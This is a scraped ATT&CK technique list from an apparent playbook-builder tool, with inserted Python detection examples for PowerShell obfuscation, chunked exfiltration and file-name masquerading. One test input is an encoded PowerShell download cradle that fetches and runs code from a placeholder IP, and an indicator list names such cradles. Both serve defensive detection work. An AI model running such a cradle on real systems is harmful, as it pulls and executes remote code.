1. Add ATT&CK Techniques (not completed)
2. Add Additional Countermeasures (not completed)
3. Review Playbook (not completed)

Step 1 of 3: Add ATT&CK Techniques

What has the adversary done? Add observed ATT&CK Techniques to your Playbook

Add Techniques from Text

Locate Techniques by pasting text that contains IDs

Example: T1595.001


Search for Techniques (1081 Techniques)

Activate Firmware Update Mode (T0800): Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction.

Monitor Process State (T0801): Adversaries may gather information about the physical process state.

Automated Collection (T0802): Adversaries may automate collection of industrial environment information using tools or scripts.

Block Command Message (T0803): Adversaries may block a command message from reaching its intended target to prevent command execution.

Block Reporting Message (T0804): Adversaries may block or prevent a reporting message from reaching its intended target.

Block Serial COM (T0805): Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices.

Brute Force I/O (T0806): Adversaries may repetitively or successively change I/O point values to perform an action.

Command-Line Interface (T0807): Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands.

Control Device Identification (T0808): Adversaries may perform control device identification to determine the make and model of a target device.

Data Destruction (T0809): Adversaries may perform data destruction over the course of an operation.

Data Historian Compromise (T0810): Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment.

Data from Information Repositories (T0811): Adversaries may target and collect data from information repositories.

Default Credentials (T0812): Adversaries may leverage manufacturer- or supplier-set default credentials on control system devices.

Denial of Control (T0813): Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls.

Denial of Service (T0814): Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality.

Denial of View (T0815): Adversaries may cause a denial of view in an attempt to disrupt and prevent operator oversight on the status of an ICS environment.

Device Restart/Shutdown (T0816): Adversaries may forcibly restart or shut down a device in an ICS environment to disrupt and potentially negatively impact physical processes.

Drive-by Compromise (T0817): Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session.

Engineering Workstation Compromise (T0818): Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment.

Exploit Public-Facing Application (T0819): Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network.

Exploitation for Evasion (T0820): Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection.

Modify Controller Tasking (T0821): Adversaries may modify the tasking of a controller to allow for the execution of their own programs.

External Remote Services (T0822): Adversaries may leverage external remote services as a point of initial access into your network.

Graphical User Interface (T0823): Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities.

I/O Module Discovery (T0824): Adversaries may use input/output (I/O) module discovery to gather key information about a control system device.

Location Identification (T0825): Adversaries may perform location identification using device data to inform operations and targeted impact for attacks.

Loss of Availability (T0826): Adversaries may attempt to disrupt essential components or systems to prevent the owner and operator from delivering products or services.

Loss of Control (T0827): Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided.

Loss of Productivity and Revenue (T0828): Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes.

Loss of View (T0829): Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation.

Adversary-in-the-Middle (T0830): Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks.

Manipulation of Control (T0831): Adversaries may manipulate physical process control within the industrial environment.

Manipulation of View (T0832): Adversaries may attempt to manipulate the information reported back to operators or controllers.

Modify Control Logic (T0833): Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic.

Native API (T0834): Adversaries may directly interact with the native OS application programming interface (API) to access system functions.

Manipulate I/O Image (T0835): Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected.

Modify Parameter (T0836): Adversaries may modify parameters used to instruct industrial control system devices.

Loss of Protection (T0837): Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions.

Modify Alarm Settings (T0838): Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios.

Module Firmware (T0839): Adversaries may install malicious or vulnerable firmware onto modular hardware devices.

Network Connection Enumeration (T0840): Adversaries may perform network connection enumeration to discover information about device communication patterns.

Network Service Scanning (T0841): Network Service Scanning is the process of discovering services on networked systems.

Network Sniffing (T0842): Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information.

Program Download (T0843): Adversaries may perform a program download to transfer a user program to a controller.

Program Organization Units (T0844): Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects.

Program Upload (T0845): Adversaries may attempt to upload a program from a PLC to gather information about an industrial process.

Remote System Discovery (T0846): Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques.

Replication Through Removable Media (T0847): Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment.

Rogue Master (T0848): Adversaries may set up a rogue master to leverage control server functions to communicate with outstations.

Masquerading (T0849): Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion.

Role Identification (T0850): Adversaries may perform role identification of devices involved with physical processes of interest in a target control system.

Rootkit (T0851): Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.

Screen Capture (T0852): Adversaries may attempt to perform screen capture of devices in the control system environment.

Scripting (T0853): Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter.

Serial Connection Enumeration (T0854): Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network.

Unauthorized Command Message (T0855): Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function.

Spoof Reporting Message (T0856): Adversaries may spoof reporting messages in control system environments for evasion and to impair process control.

System Firmware (T0857): System firmware on modern assets is often designed with an update feature.

Change Operating Mode (T0858): Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download.

Valid Accounts (T0859): Adversaries may steal the credentials of a specific user or service account using credential access techniques.

Wireless Compromise (T0860): Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network.

Point & Tag Identification (T0861): Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment.

Supply Chain Compromise (T0862): Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows.

User Execution (T0863): Adversaries may rely on a targeted organization's user interaction for the execution of malicious code.

Transient Cyber Asset (T0864): Adversaries may target devices that are transient across ICS networks and external networks.

Spearphishing Attachment (T0865): Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets.

Exploitation of Remote Services (T0866): Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse.

Lateral Tool Transfer (T0867): Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation.

Detect Operating Mode (T0868): Adversaries may gather information about a PLC's or controller's current operating mode.

Standard Application Layer Protocol (T0869): Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, Telnet, DNP3, and Modbus.

Detect Program State (T0870): Adversaries may seek to gather information about the current state of a program on a PLC.

Execution through API (T0871): Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware.

Indicator Removal on Host (T0872): Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks.

Project File Infection (T0873): Adversaries may attempt to infect project files with malicious code.

Hooking (T0874): Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means.

Change Program State (T0875): Adversaries may attempt to change the state of the current program on a control device.

I/O Image (T0877): Adversaries may seek to capture process values related to the inputs and outputs of a PLC.

Alarm Suppression (T0878): Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions.

Damage to Property (T0879): Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems.

Loss of Safety (T0880): Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur.

Service Stop (T0881): Adversaries may stop or disable services on a system to render those services unavailable to legitimate users.

Theft of Operational Information (T0882): Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations.

Internet Accessible Device (T0883): Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.

Connection Proxy (T0884): Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.

Commonly Used Port (T0885): Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection.

Remote Services (T0886): Adversaries may leverage remote services to move between assets and network segments.

Wireless Sniffing (T0887): Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments.

Remote System Information Discovery (T0888): An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration.

Modify Program (T0889): Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network.

Exploitation for Privilege Escalation (T0890): Adversaries may exploit software vulnerabilities in an attempt to elevate privileges.

Hardcoded Credentials (T0891): Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset.

Change Credential (T0892): Adversaries may modify software and device credentials to prevent operator and responder access.

Data from Local System (T0893): Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases.

System Binary Proxy Execution (T0894): Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

Autorun Image (T0895): Adversaries may leverage AutoRun functionality or scripts to execute malicious code.

Data Obfuscation (T1001): Adversaries may obfuscate command and control traffic to make it more difficult to detect.

  Data Obfuscation > Junk Data (T1001.001): Adversaries may add junk data to protocols used for command and control to make detection more difficult.

  Data Obfuscation > Steganography (T1001.002): Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult.

  Data Obfuscation > Protocol or Service Impersonation (T1001.003): Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts.

Data Compressed (T1002): An adversary may compress data (e.

OS Credential Dumping (T1003): Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password.

  OS Credential Dumping > LSASS Memory (T1003.001): Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).

  OS Credential Dumping > Security Account Manager (T1003.002): Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored.

  OS Credential Dumping > NTDS (T1003.003): Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.

  OS Credential Dumping > LSA Secrets (T1003.004): Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.

  OS Credential Dumping > Cached Domain Credentials (T1003.005): Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.

  OS Credential Dumping > DCSync (T1003.006): Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.

  OS Credential Dumping > Proc Filesystem (T1003.007): Adversaries may gather credentials from the proc filesystem or `/proc`.

  OS Credential Dumping > /etc/passwd and /etc/shadow (T1003.008): Adversaries may attempt to dump the contents of `/etc/passwd` and `/etc/shadow` to enable offline password cracking.

Winlogon Helper DLL (T1004): Winlogon.

Data from Local System (T1005): Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Direct Volume Access (T1006): Adversaries may directly access a volume to bypass file access controls and file system monitoring.

System Service Discovery (T1007): Adversaries may try to gather information about registered local system services.

Fallback Channels (T1008): Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

Binary Padding (T1009): Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary.

Application Window Discovery (T1010): Adversaries may attempt to get a listing of open application windows.

Exfiltration Over Other Network Medium (T1011): Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel.

  Exfiltration Over Other Network Medium > Exfiltration Over Bluetooth (T1011.001): Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel.

Query Registry (T1012): Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

Port Monitors (T1013): A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup.

Rootkit (T1014): Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.

Accessibility Features (T1015): Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen).

System Network Configuration Discovery (T1016)

View on ATT&CK

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems.

More Info

In Playbook
System Network Configuration Discovery

Internet Connection Discovery (T1016.001)

View on ATT&CK

Adversaries may check for Internet connectivity on compromised systems.

More Info

In Playbook
System Network Configuration Discovery

Wi-Fi Discovery (T1016.002)

View on ATT&CK

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

More Info

In Playbook

Application Deployment Software (T1017)

View on ATT&CK

Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators.

More Info

In Playbook

Remote System Discovery (T1018)

View on ATT&CK

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

More Info

In Playbook

System Firmware (T1019)

View on ATT&CK

The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.

More Info

In Playbook

Automated Exfiltration (T1020)

View on ATT&CK

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

More Info

In Playbook
Automated Exfiltration

Traffic Duplication (T1020.001)

View on ATT&CK

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure.

More Info

In Playbook

Remote Services (T1021)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Remote Desktop Protocol (T1021.001)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

SMB/Windows Admin Shares (T1021.002)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Distributed Component Object Model (T1021.003)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

SSH (T1021.004)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

VNC (T1021.005)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Windows Remote Management (T1021.006)

View on ATT&CK

Adversaries may use [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Cloud Services (T1021.007)

View on ATT&CK

Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.

More Info

In Playbook
Remote Services

Direct Cloud VM Connections (T1021.008)

View on ATT&CK

Adversaries may leverage [Valid Accounts](https://attack.

More Info

In Playbook

Data Encrypted (T1022)

View on ATT&CK

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender.

More Info

In Playbook

Shortcut Modification (T1023)

View on ATT&CK

Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

More Info

In Playbook

Custom Cryptographic Protocol (T1024)

View on ATT&CK

Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic.

More Info

In Playbook

Data from Removable Media (T1025)

View on ATT&CK

Adversaries may search connected removable media on computers they have compromised to find files of interest.

More Info

In Playbook

Multiband Communication (T1026)

View on ATT&CK

**This technique has been deprecated and should no longer be used.

More Info

In Playbook

Obfuscated Files or Information (T1027)

View on ATT&CK

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

More Info

In Playbook
Obfuscated Files or Information

Binary Padding (T1027.001)

View on ATT&CK

Adversaries may use binary padding to add junk data and change the on-disk representation of malware.

More Info

In Playbook
Obfuscated Files or Information

Software Packing (T1027.002)

View on ATT&CK

Adversaries may perform software packing or virtual machine software protection to conceal their code.

More Info

In Playbook
Obfuscated Files or Information

Steganography (T1027.003)

View on ATT&CK

Adversaries may use steganography techniques in order to prevent the detection of hidden information.

More Info

In Playbook
Obfuscated Files or Information

Compile After Delivery (T1027.004)

View on ATT&CK

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code.

More Info

In Playbook
Obfuscated Files or Information

Indicator Removal from Tools (T1027.005)

View on ATT&CK

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed.

More Info

In Playbook
Obfuscated Files or Information

HTML Smuggling (T1027.006)

View on ATT&CK

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.

More Info

In Playbook
Obfuscated Files or Information

Dynamic API Resolution (T1027.007)

View on ATT&CK

Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis.

More Info

In Playbook
Obfuscated Files or Information

Stripped Payloads (T1027.008)

Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information.

Embedded Payloads (T1027.009)

Adversaries may embed payloads within other files to conceal malicious content from defenses.

Command Obfuscation (T1027.010)

Adversaries may obfuscate content during command execution to impede detection.

Fileless Storage (T1027.011)

Adversaries may store data in "fileless" formats to conceal malicious activity from defenses.

LNK Icon Smuggling (T1027.012)

Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign Windows shortcut files.

Encrypted/Encoded File (T1027.013)

Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection.

Polymorphic Code (T1027.014)

Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection.

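Worked example for T1027.010 and T1027.013, added here and not part of the ATT&CK entries or this playbook tool. A detection that matches indicators on the raw command line misses anything behind -EncodedCommand (base64 of UTF-16LE text) or behind 'In'+'voke' style concatenation; the check below decodes and strips those layers first and only then looks for indicators. The command lines are constructed samples, and the indicator list is an assumption for the example, not one ATT&CK supplies.

```python
"""Command obfuscation triage (added example, not from this page)."""
import base64
import re

ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
INDICATORS = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|frombase64string|net\.webclient"
    r"|invoke-webrequest|\biwr\b|bypass|-nop\b|hidden)",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def deobfuscate(text: str) -> str:
    """Strip backtick escapes and join 'In'+'voke' style string concatenation."""
    text = text.replace("`", "")
    text = re.sub(r"'\s*\+\s*'", "", text)
    return re.sub(r'"\s*\+\s*"', "", text)


def analyse(cmdline: str) -> dict:
    """Decode, deobfuscate, then list matched indicators (lower-cased, sorted)."""
    decoded = decode_encoded_command(cmdline)
    # Replace the base64 blob with a marker so it cannot produce false matches.
    text = ENC_FLAG.sub("-EncodedCommand <decoded below>", cmdline)
    if decoded is not None:
        text += "\n" + decoded
    text = deobfuscate(text)
    return {
        "encoded": decoded is not None,
        "script": text,
        "indicators": sorted({m.lower() for m in INDICATORS.findall(text)}),
    }


def encode_command(script: str) -> str:
    """Inverse of the decoder; used only to build the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (the IP is a documentation address).
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    "powershell.exe -Command \"& ('In'+'voke-Ex'+'pression') 'Get-Date'\"",
    "powershell.exe -Command Get-ChildItem C:\\Users",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyse(line))
```

The decoded text, not the raw command line, is what should be stored with the alert: the first sample's command line contains nothing beyond -nop and hidden, while its decoded body carries the download cradle. Script Block Logging (event 4104) gives the same visibility on the host side for scripts that are obfuscated deeper than this check unwinds.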
Windows Remote Management (T1028)

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).

Scheduled Transfer (T1029)

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals.

Data Transfer Size Limits (T1030)

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.

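Worked example for T1029 and T1030 together, added here and not part of the ATT&CK entries or this playbook tool. Neither technique is visible in a single flow record; the signal is a source/destination pair with many outbound transfers of nearly identical size spaced at a near-constant interval. FLOWS is a constructed flow export, and min_flows and max_cv are assumed thresholds to be tuned per environment.

```python
"""Chunked, scheduled exfiltration detection (added example, not from this page)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (epoch seconds, source, destination, bytes sent).
FLOWS = [
    (1000, "10.0.0.5", "203.0.113.9", 1048576),
    (1600, "10.0.0.5", "203.0.113.9", 1048576),
    (2200, "10.0.0.5", "203.0.113.9", 1048576),
    (2800, "10.0.0.5", "203.0.113.9", 1048576),
    (3400, "10.0.0.5", "203.0.113.9", 1048576),
    (3990, "10.0.0.5", "203.0.113.9", 1048576),
    (1100, "10.0.0.7", "198.51.100.2", 4200),
    (1130, "10.0.0.7", "198.51.100.2", 51000),
    (1900, "10.0.0.7", "198.51.100.2", 900),
    (2500, "10.0.0.7", "198.51.100.2", 120000),
    (3100, "10.0.0.7", "198.51.100.2", 33000),
    (3700, "10.0.0.7", "198.51.100.2", 7000),
]


def coefficient_of_variation(values) -> float:
    """Population stdev divided by mean; 0.0 means every value is identical."""
    m = mean(values)
    return pstdev(values) / m if m else float("inf")


def find_chunked_transfers(flows, min_flows=5, max_cv=0.05):
    """Return one finding per (src, dst) pair that looks like timed, fixed-size chunks."""
    by_pair = defaultdict(list)
    for ts, src, dst, nbytes in flows:
        by_pair[(src, dst)].append((ts, nbytes))
    findings = []
    for (src, dst), recs in sorted(by_pair.items()):
        if len(recs) < min_flows:
            continue
        recs.sort()
        sizes = [b for _, b in recs]
        gaps = [recs[i + 1][0] - recs[i][0] for i in range(len(recs) - 1)]
        if coefficient_of_variation(sizes) <= max_cv and coefficient_of_variation(gaps) <= max_cv:
            findings.append({
                "src": src, "dst": dst, "flows": len(recs),
                "chunk_bytes": round(mean(sizes)),
                "interval_s": round(mean(gaps)),
                "total_bytes": sum(sizes),
            })
    return findings


if __name__ == "__main__":
    for finding in find_chunked_transfers(FLOWS):
        print(finding)
```

The second host in the sample talks to its peer just as often but with wildly varying sizes, so it is not flagged; backup agents and package mirrors also produce regular transfers, so the finding is a lead to enrich with destination reputation and total volume rather than an alert on its own.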
Modify Existing Service (T1031)

Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry.

Standard Cryptographic Protocol (T1032)

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

System Owner/User Discovery (T1033)

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.

Path Interception (T1034)

This technique has been deprecated.

Service Execution (T1035)

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager.

Masquerading (T1036)

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

Invalid Code Signature (T1036.001)

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool.

Right-to-Left Override (T1036.002)

Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign.

Rename System Utilities (T1036.003)

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.

Masquerade Task or Service (T1036.004)

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign.

Match Legitimate Name or Location (T1036.005)

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them.

Space after Filename (T1036.006)

Adversaries can hide a program's true filetype by changing the extension of a file.

Double File Extension (T1036.007)

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type.

Masquerade File Type (T1036.008)

Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents.

Break Process Trees (T1036.009)

An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID).

Masquerade Account Name (T1036.010)

Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign.

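Worked example covering the file-name sub-techniques above (T1036.002, T1036.005, T1036.006 and T1036.007), added here and not part of the ATT&CK entries or this playbook tool. One pass over a path flags a bidi control character in the name, whitespace hiding the real extension, a lure extension followed by an executable one, a known system binary outside its expected directory, and a digit-for-letter look-alike of one. The sample paths, the expected-location table and the extension lists are constructed assumptions for the example.

```python
"""File-name masquerading checks (added example, not from this page)."""
import re

RTLO = "\u202e"
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "ps1", "lnk", "hta"}
LURE_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt", "mp4", "zip"}
# Constructed: where these Windows binaries normally live (lower-case, backslashes).
EXPECTED_DIR = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}
# Digits commonly swapped for letters in look-alike names.
LOOKALIKE_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "8": "b"})


def split_path(path: str):
    """Split a Windows or POSIX path into (lower-cased directory, file name)."""
    norm = path.replace("\\", "/")
    directory, _, name = norm.rpartition("/")
    return directory.replace("/", "\\").lower(), name


def displayed_name(name: str) -> str:
    """Approximate what a bidi-aware UI shows: text after U+202E is reversed."""
    i = name.find(RTLO)
    return name if i < 0 else name[:i] + name[i + 1:][::-1]


def check_filename(path: str) -> list:
    """Return the list of masquerading indicators that apply to one path."""
    directory, name = split_path(path)
    lower = name.lower()
    findings = []
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("rtlo")
    if name != name.rstrip() or re.search(r"\s\.[^.]+$", name):
        findings.append("trailing_whitespace")
    parts = lower.split(".")
    if len(parts) >= 3 and parts[-2] in LURE_EXT and parts[-1] in EXEC_EXT:
        findings.append("double_extension")
    if lower in EXPECTED_DIR and directory not in EXPECTED_DIR[lower]:
        findings.append("wrong_location")
    plain = lower.translate(LOOKALIKE_MAP)
    if plain != lower and plain in EXPECTED_DIR:
        findings.append("lookalike_name")
    return findings


# Constructed sample paths, one per trick plus a clean control.
SAMPLE_PATHS = [
    "C:\\Users\\bob\\Downloads\\report\u202efdp.exe",   # shown as reportexe.pdf
    r"C:\Users\bob\Downloads\invoice.pdf.exe",
    "/Users/bob/Downloads/notes.txt ",
    r"C:\Users\Public\svchost.exe",
    r"C:\Windows\System32\svch0st.exe",
    r"C:\Windows\System32\svchost.exe",
]


def scan(paths) -> dict:
    """path -> findings, for paths with at least one indicator."""
    out = {}
    for p in paths:
        findings = check_filename(p)
        if findings:
            out[p] = findings
    return out


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_PATHS).items():
        print(f"{displayed_name(path)!r}: {findings}")
```

The RTLO case is worth displaying both ways in an alert: the raw name report\u202efdp.exe is what the file system stores, reportexe.pdf is what the user saw when they double-clicked it.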
Boot or Logon Initialization Scripts (T1037)

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.

Logon Script (Windows) (T1037.001)

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence.

Login Hook (T1037.002)

Adversaries may use a Login Hook to establish persistence executed upon user logon.

Network Logon Script (T1037.003)

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence.

RC Scripts (T1037.004)

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup.

Startup Items (T1037.005)

Adversaries may use startup items automatically executed at boot initialization to establish persistence.

DLL Search Order Hijacking (T1038)

Windows systems use a common method to look for required DLLs to load into a program.

Data from Network Shared Drive (T1039)

Adversaries may search network shares on computers they have compromised to find files of interest.

Network Sniffing (T1040)

Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network.

Exfiltration Over C2 Channel (T1041)

Adversaries may steal data by exfiltrating it over an existing command and control channel.

Change Default File Association (T1042)

When a file is opened, the default program used to open the file (also called the file association or handler) is checked.

Commonly Used Port (T1043)

This technique has been deprecated.

File System Permissions Weakness (T1044)

Processes may automatically execute specific binaries as part of their functionality or to perform other actions.

Software Packing (T1045)

Software packing is a method of compressing or encrypting an executable.

Network Service Discovery (T1046)

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation.

Windows Management Instrumentation (T1047)

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads.

Exfiltration Over Alternative Protocol (T1048)

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.

Exfiltration Over Symmetric Encrypted Non-C2 Protocol (T1048.001)

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002)

